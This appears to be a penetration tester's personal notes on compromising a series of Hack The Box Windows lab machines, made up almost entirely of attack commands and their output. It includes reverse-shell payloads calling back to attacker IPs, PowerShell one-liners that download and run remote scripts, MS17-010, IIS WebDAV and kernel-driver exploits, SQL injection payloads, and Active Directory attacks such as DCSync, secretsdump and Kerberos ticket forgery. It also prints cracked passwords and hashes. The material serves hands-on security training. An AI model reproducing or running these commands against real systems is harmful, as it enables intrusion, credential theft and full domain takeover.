`msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c \"iex(new-object net.webclient).downloadstring('http://10.10.14.29/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python`
if using '-a x86 --platform Windows -p windows/meterpreter/reverse_tcp' the shell died very quick, unless using msf auto-migrate

Initial_Foothold
`nmap -sU -p- --min-rate=1000 10.10.10.116` found '161/udp open snmp'
`snmpwalk -v 2c -c public 10.10.10.116 > snmpwalk_v2c.txt` found 'SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43'
crackstation crack got 'Dudecake1!' `apt install strongswan` and edit /etc/ipsec.conf and /etc/ipsec.secrets
`ipsec up conceal` if not work, try `ipsec restart`
nmap again found ftp and iis default web
ftp anonymous upload shell.asp and /upload/shell.asp
Privilege_escalation(destitute->system)
`whoami /all` 'SeImpersonatePrivilege Enabled'
https://github.com/ohpe/juicy-potato/releases

Initial_Foothold
ftp anonymous upload webshell.asp and find it in /webshell.asp
Privilege_escalation(web->system)
c:\Windows\Microsoft.NET\Framework>dir /A:D
OR `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"`
lastest .NET on target is v3.5 and `systeminfo` output 'System Type: X86-based PC', compile watson on commando VM
https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046
upload and run the MS11-046.exe get system shell

Initial_Foothold
Failed: `smbmap -H 10.10.10.161` `smbmap -H 10.10.10.161 -u test -p test` `smbclient -N -L //10.10.10.161`
`rpcclient -U "" -N 10.10.10.161` `enumdomusers` save users
`for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done`
$krb5asrep$23$svc-alfresco@HTB:c213afe360b7bcbf08a522dcb423566c$d849f59924ba2b5402b66ee1ef332c2c827c6a5f972c21ff329d7c3f084c8bc30b3f9a72ec9db43cba7fc47acf0b8e14c173b9ce692784b47ae494a4174851ae3fcbff6f839c833d3740b0e349f586cdb2a3273226d183f2d8c5586c25ad350617213ed0a61df199b0d84256f953f5cfff19874beb2cd0b3acfa837b1f33d0a1fc162969ba335d1870b33eea88b510bbab97ab3fec9013e33e4b13ed5c7f743e8e74eb3159a6c4cd967f2f5c6dd30ec590f63d9cc354598ec082c02fd0531fafcaaa5226cbf57bfe70d744fb543486ac2d60b05b7db29f482355a98aa65dff2f
`john --wordlist=/usr/share/wordlists/rockyou.txt svc-alfresco` got svc-alfresco:s3rvice
`evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice`
Privilege_escalation(svc-alfresco->Administrator)
`bloodhound-python -u svc-alfresco -p 's3rvice' -ns 10.10.10.161 -d htb.local -c all --zip`
OR use SharpHound.ps1
*Evil-WinRM* PS> iex(new-object net.webclient).downloadstring("http://10.10.14.6/SharpHound.ps1") && invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
`smbserver.py share . -smb2support -username user -password pass`
*Evil-WinRM* PS> net use \\10.10.14.6\share /u:user pass
*Evil-WinRM* PS> copy .\*_BloodHound.zip \\10.10.14.6\share\
*Evil-WinRM* PS> net use /d \\10.10.14.6\share
bloodhound shows 'svc-alfresco' is in a nested grouop of 'Account Operators' group which has' Generic All privilege' on the 'Exchange Windows Permissions' group which has 'WriteDacl' on the domain
we can use 0xdf powershell oneliner: Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync
OR follow ippsec steps:
*Evil-WinRM* PS> net user john abc123! /add /domain
*Evil-WinRM* PS> net group "Exchange Windows Permissions" john /add
*Evil-WinRM* PS> net localgroup "Remote Management Users" john /add
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> iex(new-object net.webclient).downloadstring('http://10.10.14.29/powerview.ps1')
*Evil-WinRM* PS> $pass = convertto-securestring 'abc123!' -asplain -force
*Evil-WinRM* PS> $cred = new-object system.management.automation.pscredential('htb\john', $pass)
*Evil-WinRM* PS> Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
`secretsdump.py svc-alfresco:s3rvice@10.10.10.161` got administrator hash
`wmiexec.py htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6`
`evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6`
`psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42`

Initial_Foothold
save users from papercut webpage
`cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist` note: there is a 'Fabricorp01.docx' shown on page
`hydra -L users -P wordlist 10.10.10.193 smb` found tlavel:Fabricorp01 bhult:Fabricorp01
Failed(Authentication error): `smbmap -u tlavel -p Fabricorp01 -H 10.10.10.193` `smbmap -u bhult -p Fabricorp01 -H 10.10.10.193`
Failed(NT_STATUS_LOGON_FAILURE): `smbclient -U bhult -L \\\\10.10.10.193`
Failed(NT_STATUS_PASSWORD_MUST_CHANGE): `smbclient -U bhult -L \\\\10.10.10.193`
`smbpasswd -r 10.10.10.193 bhult` enter old pass 'Fabricorp01' and new pass
`rpcclient -U bhult%${pass} 10.10.10.193`
Note: target reset the pass every min, so do it fast
0xdf oneliner: if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi; smbmap -H 10.10.10.193 -u bhult -p "$pass"
`rpcclient -U bhult%${pass} 10.10.10.193` then `querydispinfo` save users `enumprinters` found pass: $fab@s3Rv1ce$1
`crackmapexec winrm 10.10.10.193 -u users -p '$fab@s3Rv1ce$1' --continue-on-success`
`evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'`
Privilege_escalation(svc-print->system)
`whoami /all` shows 'SeLoadDriverPrivilege Enabled'
`get-item 'hklm:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\'` shows zero protection
https://www.tarlogic.com/blog/seloaddriverprivilege-privilege-escalation/
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
upload vuln drive file 'Capcom.sys' to target
https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
check the arch `systeminfo`
check .Net version `dir /A:D \Windows\Microsoft.NET\Framework` OR `reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"`
compile eoploaddriver.cpp in vitual studio as eoploaddriver.exe and upload to target
https://github.com/tandasat/ExploitCapcom
edit payload line of ExploitCapcom.cpp in vitual studio then complie as EoPLoadDriver.exe and upload to target
original payload line: TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
my edited payload line: TCHAR CommandLine[] = TEXT("C:\\ProgramData\\9001.exe");
of course I upload the 9001.exe as well
`.\eoploaddriver.exe System\CurrentControlSet\dfserv C:\ProgramData\Capcom.sys`
`.\ExploitCapcom.exe`

Initial_Foothold
Failed: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow https://www.exploit-db.com/exploits/41738
but when `searchsploit -m 41738` shows 'Codes: CVE-2017-7269'
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell
https://github.com/crypticdante/CVE-2017-7269/blob/main/ii6_reverse_shell.py
`python2 ./iis6-CVE-2017-7269.py 10.10.10.14 80 10.10.14.4 9001`
Privilege_escalation(network service->system)
`whoami /all` found 'SeImpersonatePrivilege Enabled' and `systeminfo` show its windows server 2003
https://github.com/Re4son/Churrasco/blob/master/churrasco.exe
upload nc.exe and churrasco.exe as c.exe
`.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.4 9002"`

Initial_Foothold
nmap scan shows tcp80 has:
Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
`davtest -url http://10.10.10.15` found PUT success on .txt .jhtml .pl .php .html .cfm .jsp also found MKCOL success which mean we can create dir in webroot
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.4 lport=9001 -f aspx -o payload.aspx`
`curl -X PUT http://10.10.10.15/payload.txt --data-binary @payload.aspx`
`curl -X MOVE -H "destination:http://10.10.10.15/payload.aspx" http://10.10.10.15/payload.txt`
`curl http://10.10.10.15/payload.aspx`
Privilege_escalation(network service->system)
we can use churrasco.exe the same way in 'Granny' machine
OR `python2 ~/tool/Windows-Exploit-Suggester-master/windows-exploit-suggester.py -i systeminfo.txt -d 2023-12-18-mssb.xls`
MS14-058 works as 0xdf shown in his walkthough

Initial_Foothold
gobuster dir found /documents with 2020-01-01-upload.pdf and 2020-12-15-upload.pdf
`exiftool ./*.pdf` found Creator 'William.Lee' 'Jose.Williams' save as users
`kerbrute userenum --dc 10.10.10.248 -d intelligence.htb users` both valid
Failed: `GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams`
Failed: `GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/William.Lee`
`date --date='1336 day ago' +%Y-%m-%d-upload.pdf` output: 2020-01-01-upload.pdf
`for i in $(seq 1336 1701);do date --date="$i day ago" +%Y-%m-%d-upload.pdf >> pdffilenames.txt ; done`
`for i in $(cat ./pdffilenames.txt);do wget http://10.10.10.248/documents/$i;done`
`exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > usernames.txt` which has 30 usernames
`for f in *.pdf; do pdftotext $f;done`
`find . -type f -exec grep -H pass {} \; 2>/dev/null`
found default password: NewIntelligenceCorpUser9876 from 2020-06-04-upload.txt
`kerbrute_linux_amd64 userenum -d intelligence.htb --dc 10.10.10.248 usernames.txt` all valid
`kerbrute_linux_amd64 passwordspray usernames.txt NewIntelligenceCorpUser9876 -d intelligence.htb --dc 10.10.10.248`
`crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success` found Tiffany.Molina:NewIntelligenceCorpUser9876
`smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248` readable shares: IPC$,IT,NETLOGON,SYSVOL,Users
smb: \Tiffany.Molina\desktop\> get user.txt
Privilege_escalation
`bloodhound-python -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248`
Nothing interesting in bloodhound now
//10.10.10.248/IT found downdetector.ps1
The script goes into LDAP and gets a list of all the computers, and then loops over the ones where the name starts with “web”. It will try to issue a web request to that server (with the running users’s credentials), and if the status code isn’t 200, it will email Ted.Graves and let them know that the host is down. The comment at the top says it is scheduled to run every five minutes.
we can use dnstool.py from https://github.com/dirkjanm/krbrelayx to add a new record that point to us
`python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-test --data 10.10.14.19 --type A intelligence.htb`
and use responder to catch hash
`responder -I tun0` [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:417b3c7a8c22d213:59F3EF3E1BE8AA2ACE043DCAF558B42E:010100000000000021FE40A48EDAD901FBF217B931C941D1000000000200080047004E004E00450001001E00570049004E002D004600530059004D0057003100330032004700380043000400140047004E004E0045002E004C004F00430041004C0003003400570049004E002D004600530059004D0057003100330032004700380043002E0047004E004E0045002E004C004F00430041004C000500140047004E004E0045002E004C004F00430041004C00080030003000000000000000000000000020000002A945F0608FA9810B3048A293EB361DCF404AB75A453A574D12289448307CA50A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
`john ntlm2.txt --wordlist=/usr/share/wordlists/rockyou.txt` got cred Ted.Graves:Mr.Teddy
`bloodhound-python -c ALL -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248`
user 'Ted.Graves' is in 'ITSupport' group which has 'ReadGMSAPassword' on user 'SVC_INT' which has 'AllowedToDelegate' on the Domain_Controller
`gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248` got hash svc_int$:::87c12d4a0641b2b17fb5620cc2db2ca8
`ntpdate -s 10.10.10.248` VM time will reset after 30s unless we turn it off `service virtualbox-guest-utils stop`
Bloodhound>>svc_int>>Node_Info>>Node_Properties>>AllowedToDelegate: WWW/dc.intelligence.htb
`getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :87c12d4a0641b2b17fb5620cc2db2ca8`
`export KRB5CCNAME=Administrator.ccache`
`psexec.py -no-pass -k dc.intelligence.htb` 'system_shell'
OR `KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass administrator@dc.intelligence.htb` 'administrator_shell'

Initial_Foothold
tcp8080 default tomcat page login manager with default cred of tomcat:s3cret
I use `msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=9001 -f war -o pwn.war`
upload and click and listener got system shell
0xdf use `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > rev_shell-9002.war`
`jar -ft rev_shell-9002.war` shows 'ppaejmsg.jsp'
trigger manually with `curl http://10.10.10.95:8080/rev_shell-9002/ppaejmsg.jsp`

Initial_Foothold
`nmap --script=smb-vuln* 10.10.10.4` found MS17-010 and MS-08-067(0xdf did)
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.11 lport=9001 -f exe -o 9001.exe`
`python2 ~/tool/windows-kernel-exploits-master/MS17-010/MS17-010_CVE-2017-0143-main/checker.py 10.10.10.4`
output seems test some 'pipe names' spoolss: Ok (32 bit) browser: Ok (32 bit)
`python2 ~/tool/windows-kernel-exploits-master/MS17-010/MS17-010_CVE-2017-0143-main/send_and_execute.py 10.10.10.4 9001.exe 445 browser`
and listener got a shell which can read both flags
Note: this machine do not have whoami.exe which I end up upload one and found it's a system shell

Initial_Foothold
The TLS certificate shows user roy and domain love.htb, staging.love.htb
http://staging.love.htb click 'demo' lead to /beta.php which is a URL file scaner that can abuse as SSRF(Server Side Request Forgery)
SSRF http://127.0.0.1:5000/ output the 'Voting System' cred admin:@LoveIsInTheAir!!!!
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) https://www.exploit-db.com/exploits/49445
edit the script, note that the 4 URL need remove '/votesystem' part
`python3 49445_edited.py`
manually: update admin profile photo with cmd.php, and trigger with /images/cmd.php
Privilege_escalation(phoebe-system)
winpeas.exe found 'AlwaysInstallElevated set to 1 in HKCU and HKLM' which means a user of any privilege can install .msi files as NT AUTHORITY\SYSTEM
manually confirm: `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
manually confirm: `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
According to Tib3rius, both registry need to enabled and set to 1 in order for priv_esc to work
`msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.11 lport=9001 -f msi -o 9001.msi`
upload and `msiexec /quiet /qn /i 9001.msi`
`msiexec /?` will pop gui manual, I'll save the flags note here
'/quiet' Quiet mode, no user interaction, '/qn' No UI, '/i' Installs or configures a product

`kerbrute_linux_amd64 userenum --domain htb.local --dc 10.10.10.52 --threads 50 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt` found username 'james' 'mantis'
Failed: `GetNPUsers.py 'htb.local/' -usersfile ./users.txt -format hashcat -outputfile hashes.asreproast -dc-ip 10.10.10.52`
gobuster dir http port 1337 found /secure_notes which leak /secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt which has 'OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001'
decrypted by cyberchef with 'magic' method got admin:@dm!n_P@ssW0rd!
`mssqlclient.py 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'` OR `sqsh -S 10.10.10.52 -U admin -P 'm$$ql_S@_P@ssW0rd!'`
`SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;`
`USE orcharddb; SELECT * FROM blog_Orchard_Users_UserPartRecord;` found james:J@m3s_P@ssW0rd!
no shell for james, so the next step won't be called priv_esc
ippsec and 0xdf both find MS14-068 with "lots of research"
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek ippsec's_HTB_offical_pdf
`rpcclient -U htb.local/james 10.10.10.52` enter password and `lookupnames james` got james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
`python ~/tool/windows-kernel-exploits-master/MS14-068/pykek/ms14-068.py -u james@htb.local -d mantis.htb.local -p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657` output silver ticket TGT_james@htb.local.ccache
`cp TGT_james@htb.local.ccache /tmp/krb5cc_0`
`goldenPac.py htb.local/james@mantis.htb.local`
got system shell 0xdf's_walkthrough
`apt-get install krb5-user cifs-utils`
/etc/hosts: 10.10.10.52 mantis.htb.local mantis
/etc/resolv.conf: nameserver 10.10.10.52
/etc/krb5.conf:
[libdefaults]
default_realm = HTB.LOCAL
[realms]
htb.local = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.domain.internal = htb.local
domain.internal = htb.local
`ntpdate 10.10.10.52`
`kinit james` enter password
`klist` verify ticket
`rpcclient -U htb.local/james 10.10.10.52` enter password and `lookupnames james` got james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
`python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local` enter password
`cp TGT_james@htb.local.ccache /tmp/krb5cc_0`
`smbclient -W htb.local //mantis/c$ -k` this smb session can get both flags
`goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'`

Initial_Foothold
`curl -X POST http://10.10.10.179/api/getColleagues -H 'Content-Type: application/json' -d '{"name":""}'` save usernames
save burp request to a file and sqlmap with burp inspection
`sqlmap -r colleagues.request --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dump-all --exclude-sysdbs`
The charunicodeescape tamper plugin will unicode encode all the characters in the payload. This will avoid the WAF checking for bad characters.
manual SQL Injection with UTF-16 format: eg. ' encoded_to \u0027
test' OR 1=1 -- -
encoded: \u0074\u0065\u0073\u0074\u0027\u0020\u004f\u0052\u0020\u0031\u003d\u0031\u0020\u002d\u002d\u0020\u002d
' order by 5-- -
output: normal all users
' order by 6-- -
output: 'null' which means 5 columns
test' UNION SELECT 1,@@VERSION,DB_NAME(),4,5-- -
output: MSSQL Server 2017 14.0.1000.169 (x64) on Windows Server 2016 Strandard 10.0 x64
test' UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES-- -
output: Colleagues, Logins
test' UNION SELECT 1,name,3,4,5 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Logins')-- -
output: id, password, username
test' UNION SELECT 1,username,oasswird,4,5 FROM Logins-- -
output: some hashes, cracked (password1 finance1 banking1) verify with crackmapexec smb/winrm, none works
test' UNION SELECT 1,2,3,4,SUSER_SID('MegaCorp\Administrator')-- -
output: some string not readable
ippsec use script to auto run out the full RID after find its length
test' UNION SELECT 1,2,3,4,DATALENGTH(SUSER_SID('MegaCorp\Administrator'))-- -
output: 28
0xdf use master.dbo.fn_varbintohexstr module to get the RID
test' UNION ALL SELECT 58,58,58,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Domain Admins')),58-- gxQm
output: 0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000
Verify using SUSER_SNAME
test' UNION ALL SELECT 58,58,58,SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000),58-- gxQm
Next, both ippsec and 0xdf use script to bruteforce SID to find domain users
`crackmapexec smb 10.10.10.179 -u dom_users -p passwords --continue-on-success` found tushikikatomo:finance1
`evil-winrm -u "MEGACORP\tushikikatomo" -p finance1 -i 10.10.10.179`
Privilege_escalation(tushikikatomo–>cyork)
https://github.com/taviso/cefdebug
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe
some tcp sockets links shown eg: ws://127.0.0.1:9102/1243eb8e-cffa-4cae-b922-5fa98b74e779
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe --code "process.version" --url ws://127.0.0.1:14393/5a73a31b-903d-41e8-b18d-9fb422e89234
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('whoami > C:\windows\system32\spool\drivers\color\0xdf')" --url ws://127.0.0.1:64493/fd4b0ffa-a388-40da-b01a-62709102094b
*Evil-WinRM* PS C:\programdata> type C:\windows\system32\spool\drivers\color\0xdf
output: megacorp\cyork
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('C:\\programdata\\nc.exe 10.10.14.19 443 -e cmd')" --url ws://127.0.0.1:60404/830991c3-0f17-4025-9b2c-a0ef1c8675f2
Privilege_escalation(cyork–>sbauer)
download C:\inetpub\wwwroot\bin\MultimasterAPI.dll
`strings -el MultimasterAPI.dll > MultimasterAPI.dll.strings.txt`
-e --encoding={s,S,b,l,B,L} Select character size and endianness: s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
`grep -i pass MultimasterAPI.dll.strings.txt` server=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
OR use dnSpy.exe on commando VM to analize MultimasterAPI.dll, and found cred in source code
`crackmapexec smb 10.10.10.179 -u users.txt -p 'D3veL0pM3nT!' --continue-on-success` found sbauer:D3veL0pM3nT!
`crackmapexec winrm 10.10.10.179 -u sbauer -p 'D3veL0pM3nT!'`
`evil-winrm -u 'MEGACORP\sbauer' -p 'D3veL0pM3nT!' -i 10.10.10.179`
Privilege_escalation(sbauer–>jorden)
*Evil-WinRM* PS C:\programdata> .\SharpHound.exe -c all
OR `bloodhound-python -u 'sbauer' -p 'D3veL0pM3nT!' -ns 10.10.10.179 -d MEGACORP.LOCAL -c all --zip`
In bloodhound, search the 3 users we owned and right_click>>owned then query 'Shortest Paths to High Value Targets'
user 'sbauer' has 'GenericWrite' on user 'jorden'
*Evil-WinRM* PS C:\programdata> copy \\10.10.14.19\share\PowerView.ps1 .
*Evil-WinRM* PS C:\programdata> menu
*Evil-WinRM* PS C:\programdata> Bypass-4MSI
*Evil-WinRM* PS C:\programdata> Import-Module .\PowerView.ps1
0xdf use: Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
and verify with `Get-DomainUser jorden | ConvertFrom-UACValue`
`GetNPUsers.py -no-pass -dc-ip 10.10.10.179 MEGACORP/jorden`
ippsec use: Get-ADUser -Filter 'Name -like "Jor*"' | Set-ADAccountControl -doesnotrequirepreauth $true
`GetNPUsers.py MEGACORP.local/jorden -request`
`hashcat jorden.hash --wordlist /usr/share/wordlists/rockyou.txt` got jorden:rainforest786
`evil-winrm -u 'jorden' -p 'rainforest786' -i 10.10.10.179`
Privilege_escalation(jorden->system)
`new user jorden` has 'Server Operators' group membership
https://ss64.com/nt/syntax-security_groups.html it say this group can start/stop services
According to ippsec pdf, the group can also change the properties of the 'browser' service and other services
ippsec_payload: change administrator pass
`sc.exe config browser binpath="C:\Windows\System32\cmd.exe /c net user administrator D4aUss834cWad"`
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`psexec.py administrator@10.10.10.179`
0xdf_payload: nc reverse shell
`sc.exe config browser binPath= "C:\programdata\nc64.exe -e cmd.exe 10.10.14.19 443"`
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`rlwrap nc -lnvp 443` got system shell

Initial_Foothold
ftp anonymouse login, \ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak found cred prtgadmin:PrTg@dmin2018
but the cred don't work on HTTP - PRTG Network Monitor
prtgadmin:PrTg@dmin2019 works
admin_page>>account_settings>>notifications
check 'Execute Program' The injection is in the Parameter
0xdf: test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add
ippsec: test | ping -n 5 10.10.14.10
I use: test | powershell -e ...........
listener got system shell
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution https://www.exploit-db.com/exploits/46527
I've not try this 46527.sh yet.

Initial_Foothold
tcp8080 Jenkins create a account, login, create a job, 'add build step' 'Execute Windows batch command'
'build triggers' select 'build periodically' and fill with '* * * * *' which is run every mins
but reverse shell failed, seems have firewall rule
`powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block` which shown block any outbound
`powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow` which shown allow icmp outbound
tcpdump ping received, there is a dropdown that can lead to console output
`powershell -c ls ..\..\users\` shows the folder for web_admin C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035 with config.xml in it
https://github.com/hoto/jenkins-credentials-decryptor which need -m master.key -s hudson.util.Secret -c credentials.xml
`powershell -c cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml`
`powershell -c cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\master.key`
`powershell -c [convert]::ToBase64String((cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret -Encoding byte))`
decrypt on kali `jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml` got oliver:c1cdfun_d2434
0xdf note this one works as well: `wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py`
`evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434`
Privilege_escalation(oliver->smith)
*Evil-WinRM* PS C:\programdata> upload SharpHound.ps1
*Evil-WinRM* PS C:\programdata> . .\SharpHound.ps1
*Evil-WinRM* PS C:\programdata> Invoke-BloodHound -CollectionMethod All
bloodhound “Outbound Control Rights” which shows 'oliver' has 'ForceChangePassword' over 'smith'
'smith' has 'GenericWrite' over 'maria', and 'maria' has 'WriteOwner' over 'Domain Admins'
*Evil-WinRM* PS C:\programdata> upload PowerView.ps1
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> $newpass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $newpass
`evil-winrm -i 10.10.11.132 -u smith -p '0xdf0xdf!'`
Privilege_escalation(smith->maria)
Failed(Kerberoast_password_non-crackable)
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/0xDF'}
*Evil-WinRM* PS C:\programdata> setspn -a MSSQLSvc/object.local:1433 object.local\maria
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
due to some reason, we can't act as smith unless using cred object
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $pass)
*Evil-WinRM* PS C:\programdata> Get-DomainSPNTicket -SPN "MSSQLSvc/object.local:1433" -Credential $Cred
